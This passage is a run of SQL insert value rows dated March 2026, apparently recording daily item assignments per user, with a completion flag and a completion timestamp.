(1324, 237, 1385, '2026-03-03', 0, 0, 0, NULL),
(1325, 237, 854, '2026-03-03', 0, 0, 0, NULL),
(1326, 237, 733, '2026-03-03', 0, 0, 0, NULL),
(1327, 236, 1437, '2026-03-03', 1, 0, 0, '2026-03-04 02:27:14'),
(1328, 236, 1372, '2026-03-03', 1, 0, 0, '2026-03-04 02:27:14'),
(1329, 236, 641, '2026-03-03', 1, 0, 0, '2026-03-04 02:27:14'),
(1330, 236, 1431, '2026-03-03', 1, 0, 0, '2026-03-04 02:27:14'),
(1331, 236, 1390, '2026-03-03', 1, 0, 0, '2026-03-04 02:27:14'),
(1332, 189, 606, '2026-03-04', 0, 0, 0, NULL),
(1333, 189, 1440, '2026-03-04', 0, 0, 0, NULL),
(1334, 232, 1383, '2026-03-04', 0, 0, 0, NULL),
(1335, 232, 641, '2026-03-04', 0, 0, 0, NULL),
(1336, 232, 1377, '2026-03-04', 0, 0, 0, NULL),
(1337, 232, 646, '2026-03-04', 0, 0, 0, NULL),
(1338, 232, 714, '2026-03-04', 0, 0, 0, NULL),
(1339, 239, 714, '2026-03-04', 1, 0, 0, '2026-03-04 10:00:34'),
(1340, 239, 854, '2026-03-04', 1, 0, 0, '2026-03-04 10:00:34'),
(1341, 239, 1383, '2026-03-04', 1, 0, 0, '2026-03-04 10:00:34'),
(1342, 239, 1382, '2026-03-04', 1, 0, 0, '2026-03-04 10:00:34'),
(1343, 239, 1384, '2026-03-04', 1, 0, 0, '2026-03-04 10:00:34'),
(1344, 229, 1389, '2026-03-04', 1, 0, 0, '2026-03-04 14:44:04'),
(1345, 229, 1440, '2026-03-04', 1, 0, 0, '2026-03-04 14:44:04'),
(1346, 229, 643, '2026-03-04', 1, 0, 0, '2026-03-06 23:45:58'),
(1347, 229, 641, '2026-03-04', 1, 0, 0, '2026-03-04 14:44:04'),
(1348, 229, 1442, '2026-03-04', 1, 0, 0, '2026-03-04 14:44:04'),
(1349, 237, 1387, '2026-03-04', 0, 0, 0, NULL),
(1350, 237, 693, '2026-03-04', 0, 0, 0, NULL),
(1351, 237, 1436, '2026-03-04', 0, 0, 0, NULL),
(1352, 237, 1435, '2026-03-04', 0, 0, 0, NULL),
(1353, 237, 714, '2026-03-04', 0, 0, 0, NULL),
(1354, 241, 606, '2026-03-04', 0, 0, 0, NULL),
(1355, 241, 1437, '2026-03-04', 0, 0, 0, NULL),
(1356, 241, 733, '2026-03-04', 0, 0, 0, NULL),
(1357, 241, 849, '2026-03-04', 0, 0, 0, NULL),
(1358, 241, 1373, '2026-03-04', 0, 0, 0, NULL),
(1359, 217, 1373, '2026-03-04', 0, 0, 0, NULL),
(1360, 217, 733, '2026-03-04', 0, 0, 0, NULL),
(1361, 217, 1374, '2026-03-04', 0, 0, 0, NULL),
(1362, 217, 731, '2026-03-04', 0, 0, 0, NULL),
(1363, 217, 1384, '2026-03-04', 0, 0, 0, NULL),
(1364, 199, 854, '2026-03-04', 0, 0, 0, NULL),
(1365, 199, 1382, '2026-03-04', 0, 0, 0, NULL),
(1366, 199, 733, '2026-03-04', 0, 0, 0, NULL),
(1367, 199, 1438, '2026-03-04', 0, 0, 0, NULL),
(1368, 199, 1383, '2026-03-04', 0, 0, 0, NULL),
(1369, 244, 1438, '2026-03-04', 0, 0, 0, NULL),
(1370, 244, 1387, '2026-03-04', 0, 0, 0, NULL),
(1371, 244, 1391, '2026-03-04', 0, 0, 0, NULL),
(1372, 244, 1393, '2026-03-04', 0, 0, 0, NULL),
(1373, 244, 1379, '2026-03-04', 0, 0, 0, NULL),
(1374, 234, 1385, '2026-03-04', 0, 0, 0, NULL),
(1375, 234, 943, '2026-03-04', 0, 0, 0, NULL),
(1376, 234, 733, '2026-03-04', 0, 0, 0, NULL),
(1377, 234, 646, '2026-03-04', 0, 0, 0, NULL),
(1378, 234, 1437, '2026-03-04', 0, 0, 0, NULL),
(1379, 232, 1374, '2026-03-05', 0, 0, 0, NULL),
(1380, 232, 606, '2026-03-05', 0, 0, 0, NULL),
(1381, 232, 849, '2026-03-05', 0, 0, 0, NULL),
(1382, 232, 1438, '2026-03-05', 0, 0, 0, NULL),
(1383, 225, 854, '2026-03-05', 1, 0, 0, '2026-03-06 01:34:12'),
(1384, 225, 1440, '2026-03-05', 0, 0, 0, NULL),
(1385, 225, 606, '2026-03-05', 1, 0, 0, '2026-03-05 08:19:14'),
(1386, 225, 643, '2026-03-05', 1, 0, 0, '2026-03-09 05:47:02'),
(1387, 225, 1394, '2026-03-05', 0, 0, 0, NULL),
(1388, 245, 1385, '2026-03-05', 0, 0, 0, NULL),
(1389, 245, 1372, '2026-03-05', 0, 0, 0, NULL),
(1390, 245, 648, '2026-03-05', 0, 0, 0, NULL),
(1391, 245, 1373, '2026-03-05', 0, 0, 0, NULL),
(1392, 245, 641, '2026-03-05', 0, 0, 0, NULL),
(1393, 246, 643, '2026-03-05', 0, 0, 0, NULL),
(1394, 246, 1393, '2026-03-05', 0, 0, 0, NULL),
(1395, 246, 1383, '2026-03-05', 0, 0, 0, NULL),
(1396, 246, 1380, '2026-03-05', 0, 0, 0, NULL),
(1397, 246, 1376, '2026-03-05', 0, 0, 0, NULL),
(1398, 247, 1438, '2026-03-05', 0, 0, 0, NULL),
(1399, 247, 641, '2026-03-05', 0, 0, 0, NULL),
(1400, 247, 1442, '2026-03-05', 0, 0, 0, NULL),
(1401, 247, 849, '2026-03-05', 0, 0, 0, NULL),
(1402, 247, 1394, '2026-03-05', 0, 0, 0, NULL),
(1403, 248, 1380, '2026-03-05', 0, 0, 0, NULL),
(1404, 248, 733, '2026-03-05', 0, 0, 0, NULL),
(1405, 248, 1393, '2026-03-05', 0, 0, 0, NULL),
(1406, 248, 1432, '2026-03-05', 0, 0, 0, NULL),
(1407, 248, 731, '2026-03-05', 0, 0, 0, NULL),
(1408, 249, 643, '2026-03-05', 1, 0, 0, '2026-03-05 22:21:53'),
(1409, 249, 1442, '2026-03-05', 1, 0, 0, '2026-03-05 22:21:53'),
(1410, 249, 1382, '2026-03-05', 1, 0, 0, '2026-03-05 22:21:53'),
(1411, 249, 1387, '2026-03-05', 1, 0, 0, '2026-03-05 22:21:53'),
(1412, 249, 943, '2026-03-05', 1, 0, 0, '2026-03-05 22:21:53'),
(1413, 195, 1372, '2026-03-05', 0, 0, 0, NULL),
(1414, 195, 1382, '2026-03-05', 0, 0, 0, NULL),
(1415, 195, 1375, '2026-03-05', 0, 0, 0, NULL),
(1416, 195, 646, '2026-03-05', 0, 0, 0, NULL),
(1417, 195, 1394, '2026-03-05', 0, 0, 0, NULL),
(1418, 215, 731, '2026-03-05', 1, 0, 0, '2026-03-06 01:13:14'),
(1419, 215, 1381, '2026-03-05', 1, 0, 0, '2026-03-06 01:13:14'),
(1420, 215, 1388, '2026-03-05', 1, 0, 0, '2026-03-06 01:13:14'),
(1421, 215, 1393, '2026-03-05', 1, 0, 0, '2026-03-06 01:13:14'),
(1422, 215, 1442, '2026-03-05', 1, 0, 0, '2026-03-06 01:13:14'),
(1423, 250, 646, '2026-03-06', 0, 0, 0, NULL),
(1424, 250, 1379, '2026-03-06', 0, 0, 0, NULL),
(1425, 250, 1391, '2026-03-06', 0, 0, 0, NULL),
(1426, 250, 1434, '2026-03-06', 0, 0, 0, NULL),
(1427, 250, 1431, '2026-03-06', 0, 0, 0, NULL),
(1428, 251, 648, '2026-03-06', 0, 0, 0, NULL),
(1429, 251, 1380, '2026-03-06', 0, 0, 0, NULL),
(1430, 251, 641, '2026-03-06', 0, 0, 0, NULL),
(1431, 251, 1389, '2026-03-06', 0, 0, 0, NULL),
(1432, 251, 1381, '2026-03-06', 0, 0, 0, NULL),
(1433, 254, 1375, '2026-03-06', 0, 0, 0, NULL),
(1434, 254, 1377, '2026-03-06', 0, 0, 0, NULL),
(1435, 254, 1382, '2026-03-06', 0, 0, 0, NULL),
(1436, 254, 1380, '2026-03-06', 0, 0, 0, NULL),
(1437, 254, 1373, '2026-03-06', 0, 0, 0, NULL),
(1438, 256, 1439, '2026-03-06', 0, 0, 0, NULL),
(1439, 256, 646, '2026-03-06', 0, 0, 0, NULL),
(1440, 256, 1375, '2026-03-06', 0, 0, 0, NULL),
(1441, 256, 733, '2026-03-06', 0, 0, 0, NULL),
(1442, 256, 1434, '2026-03-06', 0, 0, 0, NULL),
(1443, 225, 943, '2026-03-06', 1, 0, 0, '2026-03-06 13:20:33'),
(1444, 225, 942, '2026-03-06', 1, 0, 0, '2026-03-06 13:23:45'),
(1445, 225, 849, '2026-03-06', 1, 0, 0, '2026-03-06 13:15:27'),
(1446, 225, 1442, '2026-03-06', 1, 0, 0, '2026-03-06 13:00:02'),
(1447, 225, 1379, '2026-03-06', 1, 0, 0, '2026-03-06 13:27:43'),
(1449, 225, 1390, '2026-03-06', 1, 0, 0, '2026-03-06 13:28:45'),
(1450, 225, 733, '2026-03-06', 1, 0, 0, '2026-03-06 13:30:56'),
(1451, 257, 1431, '2026-03-06', 1, 0, 0, '2026-03-06 13:16:04'),
(1452, 257, 1381, '2026-03-06', 1, 0, 0, '2026-03-06 13:16:04'),
(1453, 257, 943, '2026-03-06', 1, 0, 0, '2026-03-06 13:16:04'),
(1454, 257, 646, '2026-03-06', 1, 0, 0, '2026-03-06 13:16:04'),
(1455, 257, 1393, '2026-03-06', 1, 0, 0, '2026-03-06 13:16:04'),
(1456, 258, 1432, '2026-03-06', 0, 0, 0, NULL),
(1457, 258, 1393, '2026-03-06', 0, 0, 0, NULL),
(1458, 258, 1385, '2026-03-06', 0, 0, 0, NULL),
(1459, 258, 1381, '2026-03-06', 0, 0, 0, NULL),
(1460, 258, 648, '2026-03-06', 0, 0, 0, NULL),
(1461, 213, 1385, '2026-03-06', 0, 0, 0, NULL),
(1462, 213, 1381, '2026-03-06', 0, 0, 0, NULL),
(1463, 213, 1439, '2026-03-06', 0, 0, 0, NULL),
(1464, 213, 646, '2026-03-06', 0, 0, 0, NULL),
(1465, 213, 1391, '2026-03-06', 0, 0, 0, NULL),
(1466, 232, 1384, '2026-03-06', 0, 0, 0, NULL),
(1467, 232, 648, '2026-03-06', 0, 0, 0, NULL),
(1468, 232, 1382, '2026-03-06', 0, 0, 0, NULL),
(1469, 232, 1389, '2026-03-06', 0, 0, 0, NULL),
(1470, 229, 1376, '2026-03-06', 1, 0, 0, '2026-03-06 23:45:58'),
(1471, 229, 1381, '2026-03-06', 1, 0, 0, '2026-03-06 23:45:58'),
(1472, 229, 643, '2026-03-06', 1, 0, 0, '2026-03-06 23:45:58'),
(1473, 229, 648, '2026-03-06', 1, 0, 0, '2026-03-06 23:45:58'),
(1474, 229, 1382, '2026-03-06', 1, 0, 0, '2026-03-06 23:45:58'),
(1475, 259, 1431, '2026-03-06', 1, 0, 0, '2026-03-07 00:46:28'),
(1476, 259, 1381, '2026-03-06', 1, 0, 0, '2026-03-07 00:46:28'),
(1477, 259, 1385, '2026-03-06', 1, 0, 0, '2026-03-07 00:46:28'),
(1478, 259, 1375, '2026-03-06', 1, 0, 0, '2026-03-07 00:46:28'),
(1479, 259, 1382, '2026-03-06', 1, 0, 0, '2026-03-07 00:46:28'),
(1480, 247, 1387, '2026-03-07', 0, 0, 0, NULL),
(1481, 247, 643, '2026-03-07', 0, 0, 0, NULL),
(1482, 247, 1393, '2026-03-07', 0, 0, 0, NULL),
(1483, 247, 1440, '2026-03-07', 0, 0, 0, NULL),
(1484, 247, 1434, '2026-03-07', 0, 0, 0, NULL),
(1485, 142, 731, '2026-03-07', 1, 0, 0, '2026-03-07 08:12:35'),
(1486, 142, 648, '2026-03-07', 0, 0, 0, NULL),
(1487, 142, 1440, '2026-03-07', 0, 0, 0, NULL),
(1488, 142, 646, '2026-03-07', 0, 0, 0, NULL),
(1489, 142, 1387, '2026-03-07', 1, 0, 0, '2026-03-07 08:14:55'),
(1490, 232, 1380, '2026-03-07', 0, 0, 0, NULL),
(1491, 232, 1384, '2026-03-07', 0, 0, 0, NULL),
(1492, 232, 1375, '2026-03-07', 0, 0, 0, NULL),
(1493, 232, 1391, '2026-03-07', 0, 0, 0, NULL),
(1494, 232, 643, '2026-03-07', 0, 0, 0, NULL),
(1495, 232, 1388, '2026-03-07', 0, 0, 0, NULL),
(1496, 232, 1385, '2026-03-07', 0, 0, 0, NULL),
(1497, 232, 1376, '2026-03-07', 0, 0, 0, NULL),
(1498, 261, 1380, '2026-03-07', 0, 0, 0, NULL),
(1499, 261, 1373, '2026-03-07', 0, 0, 0, NULL),
(1500, 261, 1376, '2026-03-07', 0, 0, 0, NULL),
(1501, 261, 1384, '2026-03-07', 0, 0, 0, NULL),
(1502, 261, 1391, '2026-03-07', 0, 0, 0, NULL),
(1503, 260, 1393, '2026-03-07', 0, 0, 0, NULL),
(1504, 260, 1439, '2026-03-07', 0, 0, 0, NULL),
(1505, 260, 643, '2026-03-07', 0, 0, 0, NULL),
(1506, 260, 1375, '2026-03-07', 0, 0, 0, NULL),
(1507, 260, 1373, '2026-03-07', 0, 0, 0, NULL),
(1508, 225, 1375, '2026-03-07', 1, 0, 0, '2026-03-07 14:41:37'),
(1509, 225, 1388, '2026-03-07', 1, 0, 0, '2026-03-07 14:44:59'),
(1510, 225, 1381, '2026-03-07', 1, 0, 0, '2026-03-07 14:46:07'),
(1511, 225, 1374, '2026-03-07', 1, 0, 0, '2026-03-07 13:38:52'),
(1512, 225, 1380, '2026-03-07', 1, 0, 0, '2026-03-07 13:42:21'),
(1513, 225, 1385, '2026-03-07', 1, 0, 0, '2026-03-07 13:44:21'),
(1515, 225, 1376, '2026-03-07', 1, 0, 0, '2026-03-07 14:43:03'),
(1516, 177, 641, '2026-03-07', 1, 0, 0, '2026-03-07 22:11:43'),
(1517, 177, 735, '2026-03-07', 1, 0, 0, '2026-03-15 07:28:58'),
(1518, 177, 738, '2026-03-07', 1, 0, 0, '2026-03-07 22:11:43'),
(1519, 177, 1312, '2026-03-07', 1, 0, 0, '2026-03-07 22:11:43'),
(1520, 177, 1395, '2026-03-07', 1, 0, 0, '2026-03-07 22:11:43'),
(1521, 259, 1432, '2026-03-07', 0, 0, 0, NULL),
(1522, 259, 1389, '2026-03-07', 0, 0, 0, NULL),
(1523, 259, 1393, '2026-03-07', 0, 0, 0, NULL),
(1524, 259, 1382, '2026-03-07', 0, 0, 0, NULL),
(1525, 259, 1437, '2026-03-07', 0, 0, 0, NULL),
(1526, 199, 1373, '2026-03-07', 0, 0, 0, NULL),
(1527, 199, 1393, '2026-03-07', 0, 0, 0, NULL),
(1528, 199, 1432, '2026-03-07', 0, 0, 0, NULL),
(1529, 199, 1439, '2026-03-07', 0, 0, 0, NULL),
(1530, 199, 641, '2026-03-07', 0, 0, 0, NULL),
(1531, 232, 1382, '2026-03-08', 0, 0, 0, NULL),
(1532, 232, 1393, '2026-03-08', 0, 0, 0, NULL),
(1533, 232, 1389, '2026-03-08', 0, 0, 0, NULL),
(1534, 232, 1432, '2026-03-08', 0, 0, 0, NULL),
(1535, 260, 1382, '2026-03-08', 0, 0, 0, NULL),
(1536, 260, 1439, '2026-03-08', 0, 0, 0, NULL),
(1537, 260, 1373, '2026-03-08', 0, 0, 0, NULL),
(1538, 260, 1391, '2026-03-08', 0, 0, 0, NULL),
(1539, 260, 641, '2026-03-08', 0, 0, 0, NULL),
(1540, 232, 643, '2026-03-08', 0, 0, 0, NULL),
(1541, 232, 1391, '2026-03-08', 0, 0, 0, NULL),
(1542, 232, 1384, '2026-03-08', 0, 0, 0, NULL),
(1543, 232, 1437, '2026-03-08', 0, 0, 0, NULL),
(1544, 177, 651, '2026-03-08', 1, 0, 0, '2026-03-15 07:28:58'),
(1545, 177, 696, '2026-03-08', 1, 0, 0, '2026-03-11 10:11:36'),
(1546, 177, 652, '2026-03-08', 1, 0, 0, '2026-03-08 14:24:47'),
(1547, 177, 1405, '2026-03-08', 1, 0, 0, '2026-03-11 10:11:36'),
(1548, 177, 697, '2026-03-08', 1, 0, 0, '2026-03-08 14:24:47'),
(1549, 222, 1437, '2026-03-08', 0, 0, 0, NULL),
(1550, 222, 1432, '2026-03-08', 0, 0, 0, NULL),
(1551, 222, 1431, '2026-03-08', 0, 0, 0, NULL),
(1552, 222, 1391, '2026-03-08', 0, 0, 0, NULL),
(1553, 222, 641, '2026-03-08', 0, 0, 0, NULL),
(1554, 189, 1391, '2026-03-08', 0, 0, 0, NULL),
(1555, 189, 1373, '2026-03-08', 0, 0, 0, NULL),
(1556, 189, 643, '2026-03-08', 0, 0, 0, NULL),
(1557, 189, 1389, '2026-03-08', 0, 0, 0, NULL),
(1558, 263, 1393, '2026-03-08', 1, 0, 0, '2026-03-09 01:31:54'),
(1559, 263, 1431, '2026-03-08', 1, 0, 0, '2026-03-09 01:31:54'),
(1560, 263, 1391, '2026-03-08', 1, 0, 0, '2026-03-09 01:31:54'),
(1561, 263, 1382, '2026-03-08', 1, 0, 0, '2026-03-09 01:31:54'),
(1562, 263, 1384, '2026-03-08', 1, 0, 0, '2026-03-09 01:31:54'),
(1563, 225, 641, '2026-03-08', 1, 0, 0, '2026-03-09 05:34:11'),
(1564, 225, 1393, '2026-03-08', 1, 0, 0, '2026-03-09 05:43:36'),
(1565, 225, 1389, '2026-03-08', 0, 0, 0, NULL),
(1566, 225, 1382, '2026-03-08', 1, 0, 0, '2026-03-09 05:42:09'),
(1567, 225, 1373, '2026-03-09', 1, 0, 0, '2026-03-09 05:32:56'),
(1568, 225, 1393, '2026-03-09', 1, 0, 0, '2026-03-09 05:43:36'),
(1569, 225, 641, '2026-03-09', 1, 0, 0, '2026-03-09 05:34:11'),
(1570, 225, 1384, '2026-03-09', 1, 0, 0, '2026-03-09 05:35:16'),
(1571, 225, 1391, '2026-03-09', 1, 0, 0, '2026-03-09 05:45:31'),
(1572, 225, 1382, '2026-03-09', 1, 0, 0, '2026-03-09 05:42:09'),
(1573, 225, 643, '2026-03-09', 1, 0, 0, '2026-03-09 05:47:02'),
(1575, 189, 1391, '2026-03-09', 0, 0, 0, NULL),
(1576, 189, 643, '2026-03-09', 0, 0, 0, NULL),
(1577, 189, 1389, '2026-03-09', 0, 0, 0, NULL),
(1578, 189, 1439, '2026-03-09', 0, 0, 0, NULL),
(1580, 189, 1431, '2026-03-09', 0, 0, 0, NULL),
(1581, 222, 1431, '2026-03-09', 0, 0, 0, NULL),
(1582, 222, 1439, '2026-03-09', 0, 0, 0, NULL),
(1583, 222, 1389, '2026-03-09', 0, 0, 0, NULL),
(1584, 222, 1432, '2026-03-09', 0, 0, 0, NULL),
(1585, 261, 1431, '2026-03-09', 0, 0, 0, NULL),
(1586, 261, 1389, '2026-03-09', 0, 0, 0, NULL),
(1587, 261, 1432, '2026-03-09', 0, 0, 0, NULL),
(1588, 261, 1439, '2026-03-09', 0, 0, 0, NULL),
(1589, 34, 1413, '2026-03-09', 0, 0, 0, NULL),
(1590, 34, 1409, '2026-03-09', 0, 0, 0, NULL),
(1591, 34, 1414, '2026-03-09', 0, 0, 0, NULL),
(1592, 34, 938, '2026-03-09', 0, 0, 0, NULL),
(1593, 34, 1407, '2026-03-09', 1, 0, 0, '2026-03-10 04:19:25'),
(1595, 34, 1255, '2026-03-09', 0, 0, 0, NULL),
(1596, 34, 720, '2026-03-09', 0, 0, 0, NULL),
(1597, 264, 1431, '2026-03-09', 1, 0, 0, '2026-03-09 12:46:11'),
(1598, 264, 1432, '2026-03-09', 1, 0, 0, '2026-03-09 12:46:11'),
(1599, 264, 1439, '2026-03-09', 1, 0, 0, '2026-03-09 12:46:11'),
(1600, 264, 1389, '2026-03-09', 1, 0, 0, '2026-03-09 12:46:11'),
(1601, 126, 1389, '2026-03-09', 0, 0, 0, NULL),
(1602, 126, 1439, '2026-03-09', 0, 0, 0, NULL),
(1603, 126, 1431, '2026-03-09', 0, 0, 0, NULL),
(1604, 126, 1432, '2026-03-09', 0, 0, 0, NULL),
(1606, 266, 1431, '2026-03-09', 1, 0, 0, '2026-03-09 16:26:47'),
(1607, 266, 1432, '2026-03-09', 0, 0, 0, NULL),
(1608, 266, 1389, '2026-03-09', 0, 0, 0, NULL),
(1609, 266, 1439, '2026-03-09', 1, 0, 0, '2026-03-09 16:42:00'),
(1626, 55, 1389, '2026-03-09', 0, 0, 0, NULL),
(1627, 55, 1431, '2026-03-09', 0, 0, 0, NULL),
(1628, 55, 1432, '2026-03-09', 0, 0, 0, NULL),
(1629, 55, 1439, '2026-03-09', 0, 0, 0, NULL),
(1647, 232, 1389, '2026-03-09', 0, 0, 0, NULL),
(1648, 232, 1432, '2026-03-09', 0, 0, 0, NULL),
(1649, 232, 651, '2026-03-09', 0, 0, 0, NULL),
(1650, 232, 696, '2026-03-09', 0, 0, 0, NULL),
(1651, 232, 738, '2026-03-09', 1, 0, 0, '2026-03-09 21:19:31'),
(1652, 232, 938, '2026-03-09', 1, 0, 0, '2026-03-09 21:22:17'),
(1653, 232, 1310, '2026-03-09', 1, 0, 0, '2026-03-09 21:23:29'),
(1654, 34, 1412, '2026-03-10', 1, 0, 0, '2026-03-10 04:19:25'),
(1655, 34, 1410, '2026-03-10', 1, 0, 0, '2026-03-10 04:19:25'),
(1656, 34, 1415, '2026-03-10', 1, 0, 0, '2026-03-10 04:19:25'),
(1657, 34, 1411, '2026-03-10', 1, 0, 0, '2026-03-10 04:19:25'),
(1658, 34, 1407, '2026-03-10', 1, 0, 0, '2026-03-10 04:19:25'),
(1662, 232, 651, '2026-03-10', 0, 0, 0, NULL),
(1663, 232, 716, '2026-03-10', 0, 0, 0, NULL),
(1664, 232, 1043, '2026-03-10', 0, 0, 0, NULL),
(1665, 232, 933, '2026-03-10', 0, 0, 0, NULL),
(1666, 232, 1406, '2026-03-10', 0, 0, 0, NULL),
(1667, 34, 1414, '2026-03-11', 0, 0, 0, NULL),
(1668, 34, 1253, '2026-03-11', 0, 0, 0, NULL),
(1669, 34, 1255, '2026-03-11', 0, 0, 0, NULL),
(1670, 34, 655, '2026-03-11', 0, 0, 0, NULL),
(1671, 34, 1408, '2026-03-11', 0, 0, 0, NULL),
(1672, 34, 1407, '2026-03-11', 0, 0, 0, NULL),
(1673, 34, 1409, '2026-03-11', 0, 0, 0, NULL),
(1674, 34, 654, '2026-03-11', 0, 0, 0, NULL),
(1675, 177, 1043, '2026-03-11', 1, 0, 0, '2026-03-11 10:11:36'),
(1676, 177, 696, '2026-03-11', 1, 0, 0, '2026-03-11 10:11:36'),
(1677, 177, 737, '2026-03-11', 1, 0, 0, '2026-03-11 10:11:36'),
(1678, 177, 1405, '2026-03-11', 1, 0, 0, '2026-03-11 10:11:36'),
(1679, 177, 1042, '2026-03-11', 1, 0, 0, '2026-03-15 07:28:58'),
(1680, 232, 737, '2026-03-11', 0, 0, 0, NULL),
(1681, 232, 696, '2026-03-11', 0, 0, 0, NULL),
(1682, 232, 932, '2026-03-11', 0, 0, 0, NULL),
(1683, 232, 1398, '2026-03-11', 0, 0, 0, NULL),
(1684, 232, 1400, '2026-03-11', 0, 0, 0, NULL),
(1685, 34, 1410, '2026-03-12', 0, 0, 0, NULL),
(1686, 34, 1415, '2026-03-12', 0, 0, 0, NULL),
(1687, 34, 1413, '2026-03-12', 0, 0, 0, NULL),
(1688, 34, 1406, '2026-03-12', 0, 0, 0, NULL),
(1691, 34, 1414, '2026-03-12', 0, 0, 0, NULL),
(1692, 34, 652, '2026-03-12', 0, 0, 0, NULL),
(1693, 34, 1411, '2026-03-13', 0, 0, 0, NULL),
(1694, 34, 1255, '2026-03-13', 0, 0, 0, NULL),
(1695, 34, 1407, '2026-03-13', 0, 0, 0, NULL),
(1696, 34, 770, '2026-03-13', 0, 0, 0, NULL),
(1697, 34, 1415, '2026-03-13', 0, 0, 0, NULL),
(1698, 34, 1413, '2026-03-13', 0, 0, 0, NULL),
(1700, 34, 1414, '2026-03-13', 0, 0, 0, NULL),
(1701, 232, 754, '2026-03-13', 0, 0, 0, NULL),
(1702, 232, 737, '2026-03-13', 0, 0, 0, NULL),
(1703, 232, 652, '2026-03-13', 0, 0, 0, NULL),
(1704, 232, 1403, '2026-03-13', 0, 0, 0, NULL),
(1705, 232, 1308, '2026-03-13', 0, 0, 0, NULL),
(1706, 232, 834, '2026-03-14', 0, 0, 0, NULL),
(1707, 232, 737, '2026-03-14', 0, 0, 0, NULL),
(1708, 232, 696, '2026-03-14', 0, 0, 0, NULL),
(1709, 232, 1397, '2026-03-14', 0, 0, 0, NULL),
(1710, 232, 1402, '2026-03-14', 0, 0, 0, NULL),
(1711, 34, 1408, '2026-03-14', 0, 0, 0, NULL),
(1712, 34, 1412, '2026-03-14', 0, 0, 0, NULL),
(1713, 34, 1413, '2026-03-14', 0, 0, 0, NULL),
(1714, 34, 1405, '2026-03-14', 0, 0, 0, NULL),
(1716, 34, 1410, '2026-03-14', 0, 0, 0, NULL),
(1718, 34, 1400, '2026-03-14', 0, 0, 0, NULL),
(1719, 287, 944, '2026-03-14', 0, 0, 0, NULL),
(1720, 287, 852, '2026-03-14', 0, 0, 0, NULL),
(1721, 287, 316, '2026-03-14', 0, 0, 0, NULL),
(1722, 296, 852, '2026-03-14', 1, 0, 0, '2026-03-14 19:34:11'),
(1723, 296, 316, '2026-03-14', 1, 0, 0, '2026-03-14 19:34:11'),
(1724, 296, 944, '2026-03-14', 1, 0, 0, '2026-03-14 19:34:11'),
(1725, 297, 944, '2026-03-14', 1, 0, 0, '2026-03-15 14:47:14'),
(1726, 297, 316, '2026-03-14', 0, 0, 0, NULL),
(1727, 297, 852, '2026-03-14', 1, 0, 0, '2026-03-15 14:50:43'),
(1728, 199, 944, '2026-03-14', 0, 0, 0, NULL),
(1729, 199, 316, '2026-03-14', 0, 0, 0, NULL),
(1730, 199, 852, '2026-03-14', 0, 0, 0, NULL),
(1734, 298, 316, '2026-03-14', 0, 0, 0, NULL),
(1735, 298, 944, '2026-03-14', 0, 0, 0, NULL),
(1736, 298, 852, '2026-03-14', 0, 0, 0, NULL),
(1743, 299, 944, '2026-03-14', 1, 0, 0, '2026-03-15 00:42:22'),
(1744, 299, 316, '2026-03-14', 1, 0, 0, '2026-03-15 00:42:22'),
(1745, 299, 852, '2026-03-14', 1, 0, 0, '2026-03-15 00:42:22'),
(1746, 283, 944, '2026-03-14', 0, 0, 0, NULL),
(1747, 283, 852, '2026-03-14', 0, 0, 0, NULL),
(1748, 283, 659, '2026-03-14', 0, 0, 0, NULL),
(1749, 283, 754, '2026-03-14', 0, 0, 0, NULL),
(1752, 283, 716, '2026-03-14', 0, 0, 0, NULL),
(1753, 283, 696, '2026-03-14', 0, 0, 0, NULL),
(1754, 300, 944, '2026-03-14', 0, 0, 0, NULL),
(1755, 300, 852, '2026-03-14', 0, 0, 0, NULL),
(1756, 300, 316, '2026-03-14', 0, 0, 0, NULL),
(1760, 34, 1410, '2026-03-15', 0, 0, 0, NULL),
(1761, 34, 1409, '2026-03-15', 0, 0, 0, NULL),
(1762, 34, 766, '2026-03-15', 0, 0, 0, NULL),
(1763, 34, 1418, '2026-03-15', 0, 0, 0, NULL),
(1764, 34, 1413, '2026-03-15', 0, 0, 0, NULL),
(1765, 34, 1255, '2026-03-15', 0, 0, 0, NULL),
(1766, 34, 1415, '2026-03-15', 0, 0, 0, NULL),
(1767, 34, 1403, '2026-03-15', 0, 0, 0, NULL),
(1769, 177, 932, '2026-03-15', 1, 0, 0, '2026-03-15 07:28:58'),
(1770, 177, 735, '2026-03-15', 1, 0, 0, '2026-03-15 07:28:58'),
(1771, 177, 716, '2026-03-15', 1, 0, 0, '2026-03-15 07:28:58'),
(1772, 177, 651, '2026-03-15', 1, 0, 0, '2026-03-15 07:28:58'),
(1773, 177, 1042, '2026-03-15', 1, 0, 0, '2026-03-15 07:28:58'),
(1774, 214, 944, '2026-03-15', 0, 0, 0, NULL),
(1775, 214, 852, '2026-03-15', 0, 0, 0, NULL),
(1778, 301, 852, '2026-03-15', 1, 0, 0, '2026-03-15 10:49:24'),
(1779, 301, 944, '2026-03-15', 1, 0, 0, '2026-03-15 10:49:24'),
(1780, 293, 944, '2026-03-15', 1, 0, 0, '2026-03-15 12:18:29'),
(1781, 293, 852, '2026-03-15', 1, 0, 0, '2026-03-15 12:18:29'),
(1782, 297, 944, '2026-03-15', 1, 0, 0, '2026-03-15 14:47:14'),
(1783, 297, 852, '2026-03-15', 1, 0, 0, '2026-03-15 14:50:43'),
(1784, 225, 735, '2026-03-15', 1, 0, 0, '2026-03-15 13:53:32'),
(1785, 225, 834, '2026-03-15', 0, 0, 0, NULL),
(1786, 225, 1043, '2026-03-15', 0, 0, 0, NULL),
(1787, 225, 651, '2026-03-15', 0, 0, 0, NULL),
(1788, 225, 944, '2026-03-15', 0, 0, 0, NULL),
(1790, 232, 652, '2026-03-15', 0, 0, 0, NULL),
(1791, 232, 737, '2026-03-15', 0, 0, 0, NULL),
(1792, 232, 669, '2026-03-15', 0, 0, 0, NULL),
(1793, 232, 656, '2026-03-15', 0, 0, 0, NULL),
(1794, 232, 1403, '2026-03-15', 0, 0, 0, NULL),
(1795, 283, 1708, '2026-03-15', 0, 0, 0, NULL),
(1796, 283, 1681, '2026-03-15', 0, 0, 0, NULL),
(1797, 283, 1690, '2026-03-15', 0, 0, 0, NULL),
(1798, 283, 1687, '2026-03-15', 0, 0, 0, NULL),
(1799, 199, 1691, '2026-03-15', 0, 0, 0, NULL),
(1800, 199, 1664, '2026-03-15', 0, 0, 0, NULL),
(1801, 199, 1657, '2026-03-15', 0, 0, 0, NULL),
(1802, 199, 1679, '2026-03-15', 0, 0, 0, NULL),
(1803, 199, 1651, '2026-03-15', 0, 0, 0, NULL),
(1804, 213, 1654, '2026-03-15', 0, 0, 0, NULL),
(1805, 213, 1665, '2026-03-15', 0, 0, 0, NULL),
